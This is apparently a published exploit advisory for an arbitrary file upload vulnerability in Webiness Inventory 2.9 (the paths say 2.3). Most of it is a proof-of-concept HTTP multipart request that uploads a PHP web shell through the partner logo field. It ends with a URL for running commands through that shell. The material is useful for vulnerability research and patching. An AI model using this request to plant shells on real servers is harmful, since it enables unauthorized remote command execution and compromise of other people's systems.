Exploit Title: Webiness Inventory 2.9 Arbitrary File Upload
Exploit Author: The Mechiavellian
Exploit Author Facebook : fb.me/The-Machiavellian-215753465894214/
Vendor Homepage || software link : https://github.com/webiness/webiness_inventory
Version: 2.9
Tested on: XAMPP win7_X64
credit to : Boumediene kaddour
> Vulnerable Code:
https://github.com/webiness/webiness_inventory/blob/master/protected/library/ajax/WsSaveToModel.php
>Proof Of Concept
POST /webiness_inventory-2.3/protected/library/ajax/*WsSaveToModel.php*
HTTP/1.1
Content-Length: 1838
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Win7_x64)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryUOOyIF2f26nDrsM7
Referer: http://172.16.122.4/webiness_inventory-2.3/index.php?request=partners/index/
Accept-Encoding: gzip
Accept-Language: en-US,en
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="model_name"
PartnerModel
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="partner_name"
My crucial Partner
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="logo"; filename="*shell.php*"
Content-Type: application/octet-stream
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="id_number"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="tax_number"
225588664477
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="iban"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="address1"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="address2"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="region_state"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="country"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="email"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="phone_number"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="web"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name=""
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name=""
------WebKitFormBoundaryUOOyIF2f26nDrsM7--
Access your shell in
http://172.16.122.4/webiness_inventory-2.3/runtime/PartnerModel/YourShell.php?cmd=whoami
